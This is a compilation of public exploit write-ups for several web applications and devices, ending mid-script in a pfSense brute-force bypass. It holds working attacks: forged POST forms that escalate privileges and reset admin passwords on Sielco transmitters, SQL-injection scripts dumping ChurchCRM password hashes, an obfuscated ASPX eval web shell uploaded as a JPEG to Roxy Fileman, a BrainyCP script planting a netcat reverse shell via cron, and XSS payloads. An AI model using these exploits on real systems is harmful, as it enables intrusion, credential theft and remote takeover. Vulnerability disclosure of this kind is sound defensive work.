<pre><code><!--<br /><br />Sielco Analog FM Transmitter 2.12 Remote Privilege Escalation<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: 2.12 (EXC5000GX)<br /> 2.12 (EXC120GX)<br /> 2.11 (EXC300GX)<br /> 2.10 (EXC1600GX)<br /> 2.10 (EXC2000GX)<br /> 2.08 (EXC1600GX)<br /> 2.08 (EXC1000GX)<br /> 2.07 (EXC3000GX)<br /> 2.06 (EXC5000GX)<br /> 1.7.7 (EXC30GT)<br /> 1.7.4 (EXC300GT)<br /> 1.7.4 (EXC100GT)<br /> 1.7.4 (EXC5000GT)<br /> 1.6.3 (EXC1000GT)<br /> 1.5.4 (EXC120GT)<br /><br />Summary: Sielco designs and produces FM radio transmitters<br />for professional broadcasting. The in-house laboratory develops<br />standard and customised solutions to meet all needs. Whether<br />digital or analogue, each product is studied to ensure reliability,<br />resistance over time and a high standard of safety. Sielco<br />transmitters are distributed throughout the world and serve<br />many radios in Europe, South America, Africa, Oceania and China.<br /><br />Desc: The application suffers from a privilege escalation vulnerability.<br />A user with Read permissions can elevate his/her privileges by sending<br />a HTTP POST request setting the parameter 'auth1' or 'auth2' or 'auth3'<br />to integer value '1' for Write or '2' for Admin permissions.<br /><br />Tested on: lwIP/2.1.1<br /> Web/3.0.3<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5755<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5755.php<br /><br /><br />26.01.2023<br /><br />--><br /><br /><br /><html><br /> <body><br /> <form action="http://transmitter/protect/users.htm" method="POST"><br /> <input type="hidden" name="pwd0" value="" /><br /> <input type="hidden" name="pwd0bis" value="" /><br /> <input type="hidden" name="user1" value="" /><br /> <input type="hidden" name="pwd1" value="" /><br /> <input type="hidden" name="pwd1bis" value="" /><br /> <input type="hidden" name="auth1" value="" /><br /> <input type="hidden" name="user2" value="test" /><br /> <input type="hidden" name="pwd2" value="" /><br /> <input type="hidden" name="pwd2bis" value="" /><br /> <input type="hidden" name="auth2" value="2" /><br /> <input type="hidden" name="user3" value="" /><br /> <input type="hidden" name="pwd3" value="" /><br /> <input type="hidden" name="pwd3bis" value="" /><br /> <input type="hidden" name="auth3" value="" /><br /> <input type="submit" value="Escalate" /><br /> </form><br /> </body><br /></html><br /></code></pre>
<pre><code><!--<br /><br />Sielco Analog FM Transmitter 2.12 Improper Access Control Change Admin Password<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: 2.12 (EXC5000GX)<br /> 2.12 (EXC120GX)<br /> 2.11 (EXC300GX)<br /> 2.10 (EXC1600GX)<br /> 2.10 (EXC2000GX)<br /> 2.08 (EXC1600GX)<br /> 2.08 (EXC1000GX)<br /> 2.07 (EXC3000GX)<br /> 2.06 (EXC5000GX)<br /> 1.7.7 (EXC30GT)<br /> 1.7.4 (EXC300GT)<br /> 1.7.4 (EXC100GT)<br /> 1.7.4 (EXC5000GT)<br /> 1.6.3 (EXC1000GT)<br /> 1.5.4 (EXC120GT)<br /><br />Summary: Sielco designs and produces FM radio transmitters<br />for professional broadcasting. The in-house laboratory develops<br />standard and customised solutions to meet all needs. Whether<br />digital or analogue, each product is studied to ensure reliability,<br />resistance over time and a high standard of safety. Sielco<br />transmitters are distributed throughout the world and serve<br />many radios in Europe, South America, Africa, Oceania and China.<br /><br />Desc: The application suffers from improper access control when<br />editing users. A user with Read permissions can manipulate users,<br />passwords and permissions by sending a single HTTP POST request<br />with modified parameters and edit other users' names, passwords<br />and permissions including admin password.<br /><br />Tested on: lwIP/2.1.1<br /> Web/3.0.3<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5756<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5756.php<br /><br /><br />26.01.2023<br /><br />--><br /><br /><br /><html><br /> <body><br /> <form action="http://transmitter/protect/users.htm" method="POST"><br /> <input type="hidden" name="pwd0" value="PWDCHANGED" /> <!-- This will set/modify admin pwd --><br /> <input type="hidden" name="pwd0bis" value="PWDCHANGED" /> <!-- This will set/modify admin pwd --><br /> <input type="hidden" name="user1" value="" /> <!-- This will set/modify user1 --><br /> <input type="hidden" name="pwd1" value="" /> <!-- This will set/modify user1 pwd --><br /> <input type="hidden" name="pwd1bis" value="" /> <!-- This will set/modify user1 pwd --><br /> <input type="hidden" name="auth1" value="0" /> <!-- This will set user1 read perm --><br /> <input type="hidden" name="user2" value="" /> <!-- This will set/modify user2 --><br /> <input type="hidden" name="pwd2" value="" /> <!-- This will set/modify user2 pwd --><br /> <input type="hidden" name="pwd2bis" value="" /> <!-- This will set/modify user2 pwd --><br /> <input type="hidden" name="auth2" value="0" /> <!-- This will set user2 read perm --><br /> <input type="hidden" name="user3" value="" /> <!-- This will set/modify user3 --><br /> <input type="hidden" name="pwd3" value="" /> <!-- This will set/modify user3 pwd --><br /> <input type="hidden" name="pwd3bis" value="" /> <!-- This will set/modify user3 pwd --><br /> <input type="hidden" name="auth3" value="0" /> <!-- This will set user3 read perm --><br /> <input type="submit" value="Modify admin pwd, delete all users" /><br /> </form><br /> </body><br /></html><br /></code></pre>
<pre><code>## Title: Bludit-4.0.0-rc-2 - Release candidate 2 Account takeover:<br />API token vulnerability<br />## Author: nu11secur1ty<br />## Date: 04.11.2013<br />## Vendor: https://www.bludit.com/<br />## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2<br />## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/<br />## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit<br /><br />## Description:<br />The already authenticated attacker can send a normal request to change<br />his password and then he can use<br />the same JSON `object` and the vulnerable `API token KEY` in the same<br />request to change the admin account password.<br />Then he can access the admin account and he can do very malicious stuff.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Exploit:<br />```PUT<br />PUT /api/users/admin HTTP/1.1<br />Host: 127.0.0.1:8000<br />Content-Length: 138<br />sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"<br />sec-ch-ua-platform: "Windows"<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50<br />Safari/537.36<br />content-type: application/json<br />Accept: */*<br />Origin: http://127.0.0.1:8000<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://127.0.0.1:8000/admin/edit-user/pwned<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui<br />Connection: close<br /><br />{"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"}<br /><br />```<br /><br />[+]Response:<br />```HTTP<br />HTTP/1.1 200 OK<br />Host: 127.0.0.1:8000<br />Date: Tue, 11 Apr 2023 08:33:51 GMT<br />Connection: close<br />X-Powered-By: PHP/7.4.30<br />Access-Control-Allow-Origin: *<br />Content-Type: application/json<br /><br />{"status":"0","message":"User edited.","data":{"key":"admin"}}<br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/w3aa4d)<br /><br />## Time spend:<br />00:57:00<br /></code></pre>
<pre><code># Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection<br /># Date: 11-03-2023<br /># Exploit Author: Arvandy<br /># Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24787/CVE-2023-24787.md<br /># Software Link: https://github.com/ChurchCRM/CRM/releases<br /># Vendor Homepage: http://churchcrm.io/<br /># Version: 4.5.1<br /># Tested on: Windows, Linux<br /># CVE: CVE-2023-24787<br /><br />"""<br />The endpoint /EventAttendance.php is vulnerable to Authenticated SQL Injection (Union-based and Blind-based) via the Event GET parameter.<br />This endpoint can be triggered through the following menu: Events - Event Attendance Reports - Church Service/Sunday School. <br />The Event Parameter is taken directly from the query string and passed into the SQL query without any sanitization or input escaping.<br />This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.<br /><br />This script is created as Proof of Concept to retrieve the username and password hash from user_usr table.<br />"""<br /><br /><br />import sys, requests<br /><br />def dumpUserTable(target, session_cookies): <br /> print("(+) Retrieving username and password")<br /> print("")<br /> url = "%s/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT('Perseverance',usr_Username,':',usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday School" % (target)<br /> headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)} <br /> r = requests.get(url, headers=headers)<br /> lines = r.text.splitlines()<br /> <br /> for line in lines: <br /> if "<td >Perseverance" in line:<br /> print(line.split("Perseverance")[1].split("</td>")[0])<br /> <br />def login(target, username, password):<br /> target = "%s/session/begin" % (target)<br /> headers = {'Content-Type': 'application/x-www-form-urlencoded'}<br /> data = "User=%s&Password=%s" % (username, password)<br /> s = requests.session()<br /> r = s.post(target, data = data, headers = headers)<br /> return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08')<br /><br />def main():<br /> print("(!) Login to the target application")<br /> session_cookies = login(target, username, password) <br /> <br /> print("(!) Exploiting the Auth SQL Injection to retrieve the username and password hash")<br /> dumpUserTable(target, session_cookies)<br /><br /> <br />if __name__ == "__main__":<br /> if len(sys.argv) != 4:<br /> print("(!) Usage: python3 exploit.py <URL> <username> <password>")<br /> print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass")<br /> sys.exit(-1)<br /><br /> target = sys.argv[1]<br /> username = sys.argv[2]<br /> password = sys.argv[3]<br /> <br /> main()<br /></code></pre>
<pre><code># Exploit Title: NotrinosERP 0.7 - Authenticated Blind SQL Injection<br /># Date: 11-03-2023<br /># Exploit Author: Arvandy<br /># Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24788/CVE-2023-24788.md<br /># Software Link: https://github.com/notrinos/NotrinosERP/releases/tag/0.7<br /># Vendor Homepage: https://notrinos.com/<br /># Version: 0.7<br /># Tested on: Windows, Linux<br /># CVE: CVE-2023-24788<br /><br />"""<br />The endpoint /sales/customer_delivery.php is vulnerable to Authenticated Blind SQL Injection (Time-based) via the GET parameter OrderNumber. <br />This endpoint can be triggered through the following menu: Sales - Sales Order Entry - Place Order - Make Delivery Against This Order.<br />The OrderNumber parameter require a valid orderNumber value.<br /><br />This script is created as Proof of Concept to retrieve database name and version through the Blind SQL Injection that discovered on the application.<br />"""<br /><br /><br />import sys, requests<br /><br />def injection(target, inj_str, session_cookies): <br /> for j in range(32, 126):<br /> url = "%s/sales/customer_delivery.php?OrderNumber=%s" % (target, inj_str.replace("[CHAR]", str(j)))<br /> headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)} <br /> r = requests.get(url, headers=headers)<br /> res = r.text<br /> if "NotrinosERP 0.7 - Login" in res:<br /> session_cookies = login(target, username, password)<br /> headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}<br /> r = requests.get(url, headers=headers)<br /> elif (r.elapsed.total_seconds () > 2 ):<br /> return j<br /> return None<br /><br />def login(target, username, password):<br /> target = "%s/index.php" % (target)<br /> headers = {'Content-Type': 'application/x-www-form-urlencoded'}<br /> data = "user_name_entry_field=%s&password=%s&company_login_name=0" % (username, password)<br /> s = requests.session()<br /> r = s.post(target, data = data, headers = headers)<br /> return s.cookies.get('Notrinos2938c152fda6be29ce4d5ac3a638a781')<br /> <br />def retrieveDBName(session_cookies): <br /> db_name = ""<br /> print("(+) Retrieving database name")<br /> for i in range (1,100):<br /> injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i<br /> retrieved_value = injection(target, injection_str, session_cookies)<br /> if (retrieved_value):<br /> db_name += chr(retrieved_value) <br /> else:<br /> break<br /> print("Database Name: "+db_name) <br /><br />def retrieveDBVersion(session_cookies):<br /> db_version = ""<br /> print("(+) Retrieving database version")<br /> for i in range (1,100):<br /> injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i<br /> retrieved_value = injection(target, injection_str, session_cookies)<br /> if (retrieved_value):<br /> db_version += chr(retrieved_value)<br /> sys.stdout.flush()<br /> else:<br /> break<br /> print("Database Version: "+db_version)<br /><br />def main():<br /> print("(!) Login to the target application")<br /> session_cookies = login(target, username, password) <br /> <br /> print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions")<br /> retrieveDBName(session_cookies)<br /> print("")<br /> retrieveDBVersion(session_cookies)<br /> <br />if __name__ == "__main__":<br /> if len(sys.argv) != 4:<br /> print("(!) Usage: python3 exploit.py <URL> <username> <password>")<br /> print("(!) E.g.,: python3 exploit.py http://192.168.1.100/NotrinosERP user pass")<br /> sys.exit(-1)<br /><br /> target = sys.argv[1]<br /> username = sys.argv[2]<br /> password = sys.argv[3]<br /> <br /> main()<br /></code></pre>
<pre><code># Exploit Title: Roxy Fileman 1.4.5 For .NET Arbitrary File Upload<br /># Date: 09/04/2023<br /># Exploit Author: Zer0FauLT [admindeepsec@proton.me]<br /># Vendor Homepage: roxyfileman.com<br /># Software Link: https://web.archive.org/web/20190317053437/http://roxyfileman.com/download.php?f=1.4.5-net<br /># Version: <= 1.4.5<br /># Tested on: Windows 10 and Windows Server 2019<br /># CVE : 0DAY<br /><br />##########################################################################################<br /># First, we upload the .jpg shell file to the server. #<br />##########################################################################################<br /><br />POST /admin/fileman/asp_net/main.ashx?a=UPLOAD HTTP/2<br />Host: pentest.com<br />Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest<br />Content-Length: 666<br />Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"<br />Accept: */*<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygOxjsc2hpmwmISeJ<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://pentest.com<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://pentest.com/admin/fileman/index.aspx<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br /><br />------WebKitFormBoundarygOxjsc2hpmwmISeJ<br />Content-Disposition: form-data; name="action"<br /><br />upload<br />------WebKitFormBoundarygOxjsc2hpmwmISeJ<br />Content-Disposition: form-data; name="method"<br /><br />ajax<br />------WebKitFormBoundarygOxjsc2hpmwmISeJ<br />Content-Disposition: form-data; name="d"<br /><br />/Upload/PenTest<br />------WebKitFormBoundarygOxjsc2hpmwmISeJ<br />Content-Disposition: form-data; name="files[]"; filename="test.jpg"<br />Content-Type: image/jpeg<br /><br />‰PNG<br /><%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %><br /><%var PAY:String=<br />Request["\x61\x62\x63\x64"];eval<br />(PAY,"\x75\x6E\x73\x61"+<br />"\x66\x65");%><br />------WebKitFormBoundarygOxjsc2hpmwmISeJ--<br /><br />##########################################################################################<br /># In the second stage, we manipulate the .jpg file that we uploaded to the server. #<br />##########################################################################################<br /><br />{<br />"FILES_ROOT": "",<br />"RETURN_URL_PREFIX": "",<br />"SESSION_PATH_KEY": "",<br />"THUMBS_VIEW_WIDTH": "140",<br />"THUMBS_VIEW_HEIGHT": "120",<br />"PREVIEW_THUMB_WIDTH": "300",<br />"PREVIEW_THUMB_HEIGHT":"200",<br />"MAX_IMAGE_WIDTH": "1000",<br />"MAX_IMAGE_HEIGHT": "1000",<br />"INTEGRATION": "ckeditor",<br />"DIRLIST": "asp_net/main.ashx?a=DIRLIST",<br />"CREATEDIR": "asp_net/main.ashx?a=CREATEDIR",<br />"DELETEDIR": "asp_net/main.ashx?a=DELETEDIR",<br />"MOVEDIR": "asp_net/main.ashx?a=MOVEDIR",<br />"COPYDIR": "asp_net/main.ashx?a=COPYDIR",<br />"RENAMEDIR": "asp_net/main.ashx?a=RENAMEDIR",<br />"FILESLIST": "asp_net/main.ashx?a=FILESLIST",<br />"UPLOAD": "asp_net/main.ashx?a=UPLOAD",<br />"DOWNLOAD": "asp_net/main.ashx?a=DOWNLOAD",<br />"DOWNLOADDIR": "asp_net/main.ashx?a=DOWNLOADDIR",<br />"DELETEFILE": "asp_net/main.ashx?a=DELETEFILE",<br />"MOVEFILE": "asp_net/main.ashx?a=MOVEFILE",<br />"COPYFILE": "asp_net/main.ashx?a=COPYFILE",<br />"RENAMEFILE": "asp_net/main.ashx?a=RENAMEFILE",<br />"GENERATETHUMB": "asp_net/main.ashx?a=GENERATETHUMB",<br />"DEFAULTVIEW": "list",<br />"FORBIDDEN_UPLOADS": "zip js jsp jsb mhtml mht xhtml xht php phtml php3 php4 php5 phps shtml jhtml pl sh py cgi exe application gadget hta cpl msc jar vb jse ws wsf wsc wsh ps1 ps2 psc1 psc2 msh msh1 msh2 inf reg scf msp scr dll msi vbs bat com pif cmd vxd cpl htpasswd htaccess",<br />"ALLOWED_UPLOADS": "bmp gif png jpg jpeg",<br />"FILEPERMISSIONS": "0644",<br />"DIRPERMISSIONS": "0755",<br />"LANG": "auto",<br />"DATEFORMAT": "dd/MM/yyyy HH:mm",<br />"OPEN_LAST_DIR": "yes"<br />}<br /><br />############################################################################################################################################################################################################################<br /># We say change the file name and we change the relevant "asp_net/main.ashx?a=RENAMEFILE" parameter with the "asp_net/main.ashx?a=MOVEFILE" parameter and manipulate the paths to be moved on the server as follows. #<br />############################################################################################################################################################################################################################<br /><br />POST /admin/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx HTTP/2<br />Host: pentest.com<br />Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest<br />Content-Length: 44<br />Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://pentest.com<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://pentest.com/admin/fileman/index.aspx<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br /><br />f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx<br /><br />===========================================================================================================================================================================================================================<br /><br />POST /admin/fileman/asp_net/main.ashx?a=MOVEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx HTTP/2<br />Host: pentest.com<br />Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest<br />Content-Length: 68<br />Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://pentest.com<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://pentest.com/admin/fileman/index.aspx<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br /><br />f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx<br /><br />##########################################################################################<br /># and it's done! #<br />##########################################################################################<br /><br />HTTP/2 200 OK<br />Cache-Control: private<br />Content-Type: text/html; charset=utf-8<br />Vary: Accept-Encoding<br />Server: Microsoft-IIS/10.0<br />X-Aspnet-Version: 4.0.30319<br />X-Powered-By-Plesk: PleskWin<br />Date: Sun, 09 Apr 2023 09:49:34 GMT<br />Content-Length: 21<br /><br />{"res":"ok","msg":""}<br /><br />=============================================================================================<br /></code></pre>
<pre><code># Exploit Title: BrainyCP V1.0 - Remote Code Execution<br /># Date: 2023-04-03<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor Homepage: https://brainycp.io<br /># Demo: https://demo.brainycp.io<br /># Tested on: Kali Linux<br /># CVE : N/A<br /><br />import requests<br /><br /># credentials<br />url = input("URL: ")<br />username = input("Username: ")<br />password = input("Password: ")<br />ip = input("IP: ")<br />port = input("Port: ")<br /><br /># login <br />session = requests.Session()<br />login_url = f"{url}/auth.php"<br />login_data = {"login": username, "password": password, "lan": "/"}<br />response = session.post(login_url, data=login_data)<br />if "Sign In" in response.text:<br /> print("[-] Wrong credentials or may the system patched.")<br /> exit()<br /><br /><br /># reverse shell <br />reverse_shell = f"nc {ip} {port} -e /bin/bash"<br /><br /># request<br />add_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron"<br />add_cron_data = {<br /> "cron_freq_minutes": "*",<br /> "cron_freq_minutes_own": "",<br /> "cron_freq_hours": "*",<br /> "cron_freq_hours_own": "",<br /> "cron_freq_days": "*",<br /> "cron_freq_days_own": "",<br /> "cron_freq_months": "*",<br /> "cron_freq_weekdays": "*",<br /> "cron_command": reverse_shell,<br /> "cron_user": username,<br />}<br />response = session.post(add_cron_url, data=add_cron_data)<br /><br />print("[+] Check your listener!")<br /> <br /><br /><br /></code></pre>
<pre><code># Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)<br /># Exploit Author: Betul Denizler<br /># Vendor Homepage: https://x2crm.com/<br /># Software Link: https://sourceforge.net/projects/x2engine/<br /># Version: X2CRM v6.6/6.9<br /># Tested on: Ubuntu Mate 20.04<br /># Vulnerable Parameter: Actions[subject]<br /># CVE: CVE-2022-48178<br /># Date: 27.12.2022<br /><br />'''<br />POC REQUEST:<br />========<br />POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) <br />Gecko/20100101 Firefox/108.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 172<br />Origin: http://localhost<br />Connection: close<br />Referer: <br />http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1<br />Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; <br />PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5; <br />YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; <br />5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; <br />d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; <br />sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsr<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=test<br /><br />EXPLOITATION<br />========<br />1. Create an action<br />2. Inject payload to the vulnerable parameter in POST request<br /><br />Payload: %3Cscript%3Ealert(1)%3C%2Fscript%3E<br />'''<br /><br /><br /><br /># Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)<br /># Exploit Author: Betul Denizler<br /># Vendor Homepage: https://x2crm.com/<br /># Software Link: https://sourceforge.net/projects/x2engine/<br /># Version: X2CRM v6.6/6.9<br /># Tested on: Ubuntu Mate 20.04<br /># Vulnerable Parameter: model<br /># CVE: Use CVE-2022-48177<br /># Date: 27.12.2022<br /><br />'''<br /><br />POC REQUEST:<br />========<br />GET <br />/x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E <br />HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) <br />Gecko/20100101 Firefox/108.0<br />Accept: <br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; <br />PHPSESSID=959fpkms4abdhtresce9k9rmk3; <br />YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; <br />d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; <br />locationTrackingFrequency=60; locationTrackingSwitch=1; <br />5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; <br />sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: none<br />Sec-Fetch-User: ?1<br /><br />EXPLOITATION<br />========<br />1. Select Import Records Model in admin settings<br />2. Inject payload to the vulnerable parameter in GET request<br /><br />Payload: "><body onload="alert(4)"><br />'''<br /> <br /><br /></code></pre>
<pre><code>#!/usr/bin/python3<br /><br />## Exploit Title: pfsenseCE v2.6.0 - Anti-brute force protection bypass<br />## Google Dork: intitle:"pfSense - Login"<br />## Date: 2023-04-07<br />## Exploit Author: FabDotNET (Fabien MAISONNETTE)<br />## Vendor Homepage: https://www.pfsense.org/<br />## Software Link: https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz<br />## Version: pfSenseCE <= 2.6.0<br />## CVE: CVE-2023-27100<br /><br /># Vulnerability<br />## CVE: CVE-2023-27100<br />## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2023-27100<br />## Security Advisory: https://docs.netgate.com/downloads/pfSense-SA-23_05.sshguard.asc<br />## Patch: https://redmine.pfsense.org/projects/pfsense/repository/1/revisions/9633ec324eada0b870962d3682d264be577edc66<br /><br />import requests<br />import sys<br />import re<br />import argparse<br />import textwrap<br />from urllib3.exceptions import InsecureRequestWarning<br /><br /># Expected Arguments<br />parser = argparse.ArgumentParser(description="pfsenseCE <= 2.6.0 Anti-brute force protection bypass",<br /> formatter_class=argparse.RawTextHelpFormatter,<br /> epilog=textwrap.dedent(''' <br />Exploit Usage : <br />./CVE-2023-27100.py -l http://<pfSense>/ -u user.txt -p pass.txt<br />./CVE-2023-27100.py -l http://<pfSense>/ -u /Directory/user.txt -p /Directory/pass.txt'''))<br /><br />parser.add_argument("-l", "--url", 